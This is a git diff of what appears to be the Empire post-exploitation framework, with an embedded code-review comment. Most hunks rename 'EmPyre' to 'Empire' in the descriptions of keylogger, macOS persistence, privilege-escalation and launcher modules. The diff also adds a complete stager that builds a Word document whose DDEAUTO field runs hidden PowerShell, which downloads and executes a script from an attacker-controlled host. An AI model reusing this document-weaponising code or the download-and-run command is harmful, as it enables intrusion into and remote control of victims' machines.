0, 0) + + if ((ks >> 8) & 0xFF) == 0xFE or ks in (0xffe2, 0xffe3, 0xffe5, 0xffe6): + # Ignore group shifts and shift key info + continue + + uks = keysym_to_unicode(ks) + xk = keysym_to_XK(ks) + if xk: + keys.add(u'<{}>'.format(xk)) + elif uks: + keys.add(uks) + elif ks: + keys.add(u'{{{}}}'.format(ks)) + + return u''.join(keys) +run() + +job_message_buffer('[!] Keylogger exited\\n') + +""" + + return script diff --git a/lib/modules/python/management/multi/spawn.py b/lib/modules/python/management/multi/spawn.py index 2f05c46..6e29ecd 100644 --- a/lib/modules/python/management/multi/spawn.py +++ b/lib/modules/python/management/multi/spawn.py @@ -14,7 +14,7 @@ class Module: 'Author': ['@harmj0y'], # more verbose multi-line description of the module - 'Description': ('Spawns a new EmPyre agent.'), + 'Description': ('Spawns a new Empire agent.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/persistence/osx/CreateHijacker.py b/lib/modules/python/persistence/osx/CreateHijacker.py index 826e610..fa0c22c 100644 --- a/lib/modules/python/persistence/osx/CreateHijacker.py +++ b/lib/modules/python/persistence/osx/CreateHijacker.py 
@@ -12,7 +12,7 @@ class Module: 'Author': ['@patrickwardle,@xorrior'], # more verbose multi-line description of the module - 'Description': ('Configures and EmPyre dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied local to the hijackerPath'), + 'Description': ('Configures and Empire dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied local to the hijackerPath'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/persistence/osx/RemoveDaemon.py b/lib/modules/python/persistence/osx/RemoveDaemon.py index 13b525f..0c05fe1 100644 --- a/lib/modules/python/persistence/osx/RemoveDaemon.py +++ b/lib/modules/python/persistence/osx/RemoveDaemon.py @@ -13,7 +13,7 @@ class Module: 'Author': ['@xorrior'], # more verbose multi-line description of the module - 'Description': ('Remove an EmPyre Launch Daemon.'), + 'Description': ('Remove an Empire Launch Daemon.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/persistence/osx/launchdaemonexecutable.py b/lib/modules/python/persistence/osx/launchdaemonexecutable.py index 46a4b07..8a80590 100644 --- a/lib/modules/python/persistence/osx/launchdaemonexecutable.py +++ b/lib/modules/python/persistence/osx/launchdaemonexecutable.py @@ -12,7 +12,7 @@ class Module: 'Author': ['@xorrior'], # more verbose multi-line description of the module - 'Description': ('Installs an EmPyre launchDaemon.'), + 'Description': ('Installs an Empire launchDaemon.'), # True if the module needs to run in the background 'Background' : False, 
@@ -67,7 +67,7 @@ class Module: 'Value' : 'com.proxy.initialize' }, 'DaemonLocation' : { - 'Description' : 'The full path of where the EmPyre launch daemon should be located.', + 'Description' : 'The full path of where the Empire launch daemon should be located.', 'Required' : True, 'Value' : '' } @@ -163,7 +163,7 @@ process = subprocess.Popen('launchctl load /Library/LaunchDaemons/%s', stdout=su process.communicate() print "\\n[+] Persistence has been installed: /Library/LaunchDaemons/%s" -print "\\n[+] EmPyre daemon has been written to %s" +print "\\n[+] Empire daemon has been written to %s" """ % (encBytes,plistSettings, programname, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, programname) diff --git a/lib/modules/python/persistence/osx/loginhook.py b/lib/modules/python/persistence/osx/loginhook.py index 0b3bd63..37c4755 100644 --- a/lib/modules/python/persistence/osx/loginhook.py +++ b/lib/modules/python/persistence/osx/loginhook.py @@ -11,7 +11,7 @@ class Module: 'Author': ['@Killswitch-GUI'], # more verbose multi-line description of the module - 'Description': ('Installs EmPyre agent via LoginHook.'), + 'Description': ('Installs Empire agent via LoginHook.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/privesc/multi/sudo_spawn.py b/lib/modules/python/privesc/multi/sudo_spawn.py index fbece19..d684ef4 100644 --- a/lib/modules/python/privesc/multi/sudo_spawn.py +++ b/lib/modules/python/privesc/multi/sudo_spawn.py @@ -14,7 +14,7 @@ class Module: 'Author': ['@harmj0y'], # more verbose multi-line description of the module - 'Description': ('Spawns a new EmPyre agent using sudo.'), + 'Description': ('Spawns a new Empire agent using sudo.'), # True if the module needs to run in the background 'Background' : False, 
diff --git a/lib/modules/python/privesc/osx/piggyback.py b/lib/modules/python/privesc/osx/piggyback.py index d71dcaf..4875269 100644 --- a/lib/modules/python/privesc/osx/piggyback.py +++ b/lib/modules/python/privesc/osx/piggyback.py @@ -14,7 +14,7 @@ class Module: 'Author': ['@n00py'], # more verbose multi-line description of the module - 'Description': ('Spawns a new EmPyre agent using an existing sudo session. This works up until El Capitan.'), + 'Description': ('Spawns a new Empire agent using an existing sudo session. This works up until El Capitan.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/stagers/multi/bash.py b/lib/stagers/multi/bash.py index c3f5694..fba4a39 100644 --- a/lib/stagers/multi/bash.py +++ b/lib/stagers/multi/bash.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@harmj0y'], - 'Description': ('Generates self-deleting Bash script to execute the EmPyre stage0 launcher.'), + 'Description': ('Generates self-deleting Bash script to execute the Empire stage0 launcher.'), 'Comments': [ '' diff --git a/lib/stagers/multi/pyinstaller.py b/lib/stagers/multi/pyinstaller.py index 5175fbb..6f4b78b 100644 --- a/lib/stagers/multi/pyinstaller.py +++ b/lib/stagers/multi/pyinstaller.py @@ -1,17 +1,19 @@ from lib.common import helpers +import os """ Install steps... - install pyInstaller --- try: apt-get -y install python-pip && pip install pyinstaller +-- try: + - copy into stagers directory --- ./EmPyre/lib/stagers/ +-- ./Empire/lib/stagers/ -- kick off the emPyre agent on a remote target --- /tmp/emPyre & +- kick off the empire agent on a remote target +-- /tmp/empire & @TweekFawkes 
@@ -26,7 +28,7 @@ class Stager: 'Author': ['@TweekFawkes'], - 'Description': ('Generates an ELF binary payload launcher for EmPyre using pyInstaller.'), + 'Description': ('Generates an ELF binary payload launcher for Empire using pyInstaller.'), 'Comments': [ 'Needs to have pyInstaller setup on the system you are creating the stager on. For debian based operatins systems try the following command: apt-get -y install python-pip && pip install pyinstaller' @@ -42,21 +44,21 @@ class Stager: 'Required' : True, 'Value' : '' }, - 'Language' : { - 'Description' : 'Language of the stager to generate.', - 'Required' : True, - 'Value' : 'python' - }, + 'Language' : { + 'Description' : 'Language of the stager to generate.', + 'Required' : True, + 'Value' : 'python' + }, 'BinaryFile' : { 'Description' : 'File to output launcher to.', 'Required' : True, - 'Value' : '/tmp/emPyre' + 'Value' : '/tmp/empire' + }, + 'SafeChecks' : { + 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', + 'Required' : True, + 'Value' : 'True' }, - 'SafeChecks' : { - 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', - 'Required' : True, - 'Value' : 'True' - }, 'Base64' : { 'Description' : 'Switch. Base64 encode the output. Defaults to False.', 'Required' : True, 
@@ -112,21 +114,16 @@ class Stager: self.conn = self.mainMenu.conn # pull out the code install path from the database config cur = self.conn.cursor() - #cur.execute("SELECT install_path FROM config") - #installPath_Str = cur.fetchone()[0] + cur.close() - import os -#<<<<<<< HEAD:lib/stagers/osx/pyinstaller.py + stagerFFP_Str = self.mainMenu.installPath + "/data/agent/stagers/http.py" - #stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stager.py") -#======= - stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stagers/http.py") -#>>>>>>> ec606351797a9f97676a33767f38e341bd1e18bf:lib/stagers/multi/pyinstaller.py + stagerFFP_Str = os.path.join(self.mainMenu.installPath, "data/agent/stagers/http.py") + filesToExtractImportsFrom_List.append(stagerFFP_Str) agentFFP_Str = self.mainMenu.installPath + "/data/agent/agent.py" - #agentFFP_Str = os.path.join(installPath_Str, "data/agent/agent.py") filesToExtractImportsFrom_List.append(agentFFP_Str) imports_List = [] diff --git a/lib/stagers/osx/applescript.py b/lib/stagers/osx/applescript.py index 126c0cb..4c967df 100644 --- a/lib/stagers/osx/applescript.py +++ b/lib/stagers/osx/applescript.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@harmj0y'], - 'Description': ('Generates AppleScript to execute the EmPyre stage0 launcher.'), + 'Description': ('Generates AppleScript to execute the Empire stage0 launcher.'), 'Comments': [ '' diff --git a/lib/stagers/osx/application.py b/lib/stagers/osx/application.py index 3008251..dd64609 100644 --- a/lib/stagers/osx/application.py +++ b/lib/stagers/osx/application.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@xorrior'], - 'Description': ('Generates an EmPyre Application.'), + 'Description': ('Generates an Empire Application.'), 'Comments': [ '' 
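Review bot: `stagerFFP_Str` is assigned twice in a row on the new side — the `self.mainMenu.installPath + "/data/agent/stagers/http.py"` form is dead, immediately overwritten by the `os.path.join(self.mainMenu.installPath, "data/agent/stagers/http.py")` form — so one of them should go, and `agentFFP_Str` two lines down would then read more consistently as `os.path.join(self.mainMenu.installPath, "data/agent/agent.py")`. The cursor from `cur = self.conn.cursor()` is now closed on the very next line without ever being used, since the removed `SELECT install_path FROM config` lookup was replaced by `self.mainMenu.installPath`; the comment above it still describes that database lookup, and the `self.conn` / `cur` lines can be dropped together with it. The enclosing method starts and ends outside the hunk.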
@@ -42,7 +42,7 @@ class Stager: 'Value' : '' }, 'OutFile' : { - 'Description' : 'path to output EmPyre application. The application will be saved to a zip file.', + 'Description' : 'path to output Empire application. The application will be saved to a zip file.', 'Required' : True, 'Value' : '/tmp/out.zip' }, diff --git a/lib/stagers/osx/ducky.py b/lib/stagers/osx/ducky.py index 883d534..f4873b2 100755 --- a/lib/stagers/osx/ducky.py +++ b/lib/stagers/osx/ducky.py @@ -9,7 +9,7 @@ class Stager: 'Author': ['@xorrior'], - 'Description': ('Generates a ducky script that runs a one-liner stage0 launcher for EmPyre.'), + 'Description': ('Generates a ducky script that runs a one-liner stage0 launcher for Empire.'), 'Comments': [ '' diff --git a/lib/stagers/osx/launcher.py b/lib/stagers/osx/launcher.py index aca7f95..4b09157 100644 --- a/lib/stagers/osx/launcher.py +++ b/lib/stagers/osx/launcher.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@harmj0y'], - 'Description': ('Generates a one-liner stage0 launcher for EmPyre.'), + 'Description': ('Generates a one-liner stage0 launcher for Empire.'), 'Comments': [ '' diff --git a/lib/stagers/osx/pkg.py b/lib/stagers/osx/pkg.py index 7a5a2d7..910dc81 100644 --- a/lib/stagers/osx/pkg.py +++ b/lib/stagers/osx/pkg.py @@ -9,7 +9,7 @@ class Stager: 'Author': ['@xorrior'], - 'Description': ('Generates a pkg installer. The installer will copy a custom (empty) application to the /Applications folder. The postinstall script will execute an EmPyre launcher.'), + 'Description': ('Generates a pkg installer. The installer will copy a custom (empty) application to the /Applications folder. The postinstall script will execute an Empire launcher.'), 'Comments': [ '' diff --git a/lib/stagers/osx/safari_launcher.py b/lib/stagers/osx/safari_launcher.py index 9f16b63..f9ee215 100644 --- a/lib/stagers/osx/safari_launcher.py +++ b/lib/stagers/osx/safari_launcher.py 
@@ -10,7 +10,7 @@ class Stager: 'Author': ['@424f424f'], - 'Description': ('Generates an HTML payload launcher for EmPyre.'), + 'Description': ('Generates an HTML payload launcher for Empire.'), 'Comments': [ 'https://www.exploit-db.com/exploits/38535/' @@ -98,4 +98,4 @@ class Stager: }; """ % (launcher) - return html \ No newline at end of file + return html diff --git a/lib/stagers/osx/teensy.py b/lib/stagers/osx/teensy.py index 924bfb7..cc8ae05 100644 --- a/lib/stagers/osx/teensy.py +++ b/lib/stagers/osx/teensy.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['Matt @matterpreter Hand'], - 'Description': ('Generates a Teensy script that runs a one-liner stage0 launcher for EmPyre.'), + 'Description': ('Generates a Teensy script that runs a one-liner stage0 launcher for Empire.'), 'Comments': [ '' @@ -116,7 +116,7 @@ class Stager: teensyCode += " Keyboard.send_now();\n" teensyCode += " clearKeys();\n" teensyCode += "}\n\n" - teensyCode += "void empyre(void) {\n" + teensyCode += "void empire(void) {\n" teensyCode += " delay(500);\n" teensyCode += " mac_minWindows();\n" teensyCode += " mac_minWindows();\n" @@ -132,7 +132,7 @@ class Stager: teensyCode += " Keyboard.println(\"exit\");\n" teensyCode += "}\n\n" teensyCode += "void setup(void) {\n" - teensyCode += " empyre();\n" + teensyCode += " empire();\n" teensyCode += "}\n\n" teensyCode += "void loop() {}" diff --git a/lib/stagers/windows/macroless_msword.py b/lib/stagers/windows/macroless_msword.py new file mode 100644 index 0000000..f40fe1c --- /dev/null +++ b/lib/stagers/windows/macroless_msword.py 
@@ -0,0 +1,171 @@ +# -*- coding: utf-8 -*- +from lib.common import helpers +import os + +class Stager: + + def __init__(self, mainMenu, params=[]): + + # metadata info about the module, not modified during runtime + self.info = { + 'Name': 'Macroless code execution in MSWord', + + 'Author': ['james fitts'], + + 'Description': ('Creates a macroless document utilizing a formula field for code execution'), + + 'Comments': ["Hard work by Etienne Stalmas and Saif El-Sherei"] + } + + # any options needed by the module, settable during runtime + self.options = { + # format: + # value_name : {description, required, default_value} + 'Listener' : { + 'Description' : 'Listener to use for the payload.', + 'Required' : True, + 'Value' : '' + }, + 'OutputPs1' : { + 'Description' : 'PS1 file to execute against the target.', + 'Required' : True, + 'Value' : 'default.ps1' + }, + 'OutputDocx' : { + 'Description' : 'MSOffice document name.', + 'Required' : True, + 'Value' : 'empire.docx' + }, + 'OutputPath' : { + 'Description' : 'Output path for the files.', + 'Required' : True, + 'Value' : '/tmp/' + }, + 'HostURL' : { + 'Description' : 'IP address to host the malicious ps1 file.', + 'Required' : True, + 'Value' : 'http://192.168.1.1:80' + } + } + + # save off a copy of the mainMenu object to access external functionality + # like listeners/agent handlers/etc. + self.mainMenu = mainMenu + + # During instantiation, any settable option parameters + # are passed as an object set to the module and the + # options dictionary is automatically set. 
This is mostly + # in case options are passed on the command line + if params: + for param in params: + # parameter format is [Name, Value] + option, value = param + if option in self.options: + self.options[option]['Value'] = value + + def generate(self, obfuscate=False, obfuscationCommand=""): + + listener = self.options['Listener']['Value'] + output_path = self.options['OutputPath']['Value'] + output_docx = self.options['OutputDocx']['Value'] + host = self.options['HostURL']['Value'] + ps1 = self.options['OutputPs1']['Value'] + + if not self.mainMenu.listeners.is_listener_valid(listener): + print helpers.color("[!] Invalid listener: " + listener) + return "" + else: + launcher = self.mainMenu.stagers.generate_launcher(listener, language='powershell', encode=True) + + def create_directory_structure(outdir): + os.makedirs(outdir + "_rels") + os.makedirs(outdir + "docProps") + os.makedirs(outdir + "word") + os.makedirs(outdir + "word/_rels") + os.makedirs(outdir + "word/theme") + + def create_files(outdir): + content_types = """ +""" + + f = open(outdir + "[Content_Types].xml", 'w') + f.write(content_types) + + hidden_rels = """ +""" + + f = open(outdir + "_rels/.rels", 'w') + f.write(hidden_rels) + + docProps_app = """ +211270Microsoft Office Word011falseTitle1false81falsefalse16.0000""" + + f = open(outdir + "docProps/app.xml", 'w') + f.write(docProps_app) + + docProps_core = """ +AdministratorAdministrator12017-10-11T12:49:00Z2017-10-11T12:51:00Z""" + + f = open(outdir + "docProps/core.xml", 'w') + f.write(docProps_core) + + word_rels = """ +""" + + f = open(outdir + "word/_rels/document.xml.rels", 'w') + f.write(word_rels) + + word_theme = """ +""" + + f = open(outdir + "word/theme/theme1.xml", 'w') + f.write(word_theme) + + font_table = """ +""" + + f = open(outdir + "word/fontTable.xml", 'w') + f.write(font_table) + + settings = """ +""" + + f = open(outdir + "word/settings.xml", 'w') + f.write(settings) + + styles = """ +""" + + f = open(outdir + 
"word/styles.xml", 'w') + f.write(styles) + + web_settings = """ +""" + + f = open(outdir + "word/webSettings.xml", 'w') + f.write(web_settings) + + def craft_exploit(outdir, url, pshell): + document = """ +DDEAUTO C:\\\\Windows\\\\System32\\\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('%s/%s');powershell -noP -sta -w 1 -enc $e "!Unexpected End of Formula""" % (url, pshell) + + f = open(outdir + "word/document.xml", 'w') + f.write(document) + + def craft_ps(outdir, pshell_blob, fname): + pshell_blob = pshell_blob.split("powershell -noP -sta -w 1 -enc ")[1] + f = open(outdir + fname, 'w') + f.write(pshell_blob) + + if output_path[-1] != "/": + output_path = output_path + "/" + + create_directory_structure(output_path) + create_files(output_path) + craft_ps(output_path, launcher, ps1) + craft_exploit(output_path, host, ps1) + + print helpers.color("[+] '%s' and '%s' was created in the '%s' directory" % (output_docx, ps1, output_path)) + + return os.system("cd %s && zip %s%s -r [Content_Types].xml docProps/ _rels word && rm -rf [Content_Types].xml docProps/ _rels/ word/ && cd -" % (output_path, output_path, output_docx)) +